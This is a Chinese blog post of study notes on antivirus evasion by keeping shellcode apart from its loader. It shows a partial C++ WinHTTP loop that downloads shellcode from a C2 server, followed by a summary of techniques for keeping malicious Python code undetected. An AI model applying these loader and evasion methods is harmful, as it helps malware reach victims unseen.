认识分离免杀

分离免杀是将恶意代码放置在程序本身之外的一种加载方式。

从文件中加载shellcode

首先是最基本的,从raw格式文件中读取shellcode

raw bin文件二进制 payload 十六进制

raw采用文件读取的方式

c++文件流多复习复习

从web加载shellcode

远程加载

两种思路:一是从socket连接加载,客户端连接c2端口,返回shellcode

二是从http连接加载,访问c2的url返回shellcode

WinHttpOpen //初始化一个winhttp-session句柄,

WinHttpConnect //通过上述句柄连接到服务器,需要指定服务器ip和端口号

WinHttpOpenRequest //通过hconnect句柄创建一个hRequest句柄,用于发送数据与读取从服务器返回的数据。

WinHttpSendRequest // 发送请求

WinHttpReceiveResponse //发送请求成功则准备接收服务器的response

do
{
//(1) 获取返回数据的大小(以字节为单位)
    dwSize = 0;
    if (!WinHttpQueryDataAvailable(hRequest, &dwSize)) {
        cout << "Error:WinHttpQueryDataAvailable failed:" << GetLastError() << endl;
        break;
    }
    if (!dwSize)    break;  //数据大小为0                
    //(2) 根据返回数据的长度为buffer申请内存空间
    pszOutBuffer = new char[dwSize + 1];
    if (!pszOutBuffer) {
        cout << "Out of memory." << endl;
        break;
    }
    ZeroMemory(pszOutBuffer, dwSize + 1);       //将buffer置0
    //(3) 通过WinHttpReadData读取服务器的返回数据
    if (!WinHttpReadData(hRequest, pszOutBuffer, dwSize, &dwDownloaded)) {
        cout << "Error:WinHttpQueryDataAvailable failed:" << GetLastError() << endl;
    }
    if (!dwDownloaded)
        break;
} while (dwSize > 0);
//将返回数据转换成UTF8
DWORD dwNum = MultiByteToWideChar(CP_ACP, 0, pszOutBuffer, -1, NULL, 0);    //返回原始ASCII码的字符数目       
pwText = new wchar_t[dwNum];                                                //根据ASCII码的字符数分配UTF8的空间
MultiByteToWideChar(CP_UTF8, 0, pszOutBuffer, -1, pwText, dwNum);  

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Python免杀是指在编写Python恶意代码时,通过一系列技术手段绕过杀毒软件的检测和阻止。在进行Python免杀时,可以采取多种常用的静态免杀技术,如特征码定位修改、填充花指令、文件加壳、内存执行、shellcode混淆、shellcode和loader分离、木马资源修改和调用系统白名单等。这些技术可以帮助我们在编写Python恶意代码时避免被杀毒软件检测到。 其中,特征码定位修改是指通过修改代码中的特征码或者特征码的位置,使得杀毒软件无法识别恶意代码。填充花指令是在代码中插入一些无实际功能的指令,以混淆代码结构,增加杀毒软件的分析难度。文件加壳是将恶意代码嵌入到其他可信的文件中,以绕过杀毒软件的检测。内存执行是将恶意代码直接加载到内存中执行,避免了被杀毒软件静态检测的可能。shellcode混淆是通过对shellcode进行变形或加密,使其难以被杀毒软件识别。shellcode和loader分离是将shellcode和加载器分离,使得杀毒软件难以检测到完整的恶意代码。木马资源修改是通过修改恶意代码所依赖的资源文件或者库文件,绕过杀毒软件的检测。调用系统白名单是指利用操作系统的合法功能或者系统自带的程序来执行恶意代码,使其被认为是正常行为而不被杀毒软件拦截。 需要注意的是,不同语言的shellcode和loader在免杀效果上有所差异,而Python在免杀中的效果相对较好。此外,选择小众语言和不同的exe打包器也可以提高免杀效果。同时,在编写Python恶意代码时,尽量避免使用敏感词汇,以降低被杀毒软件查杀的概率。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值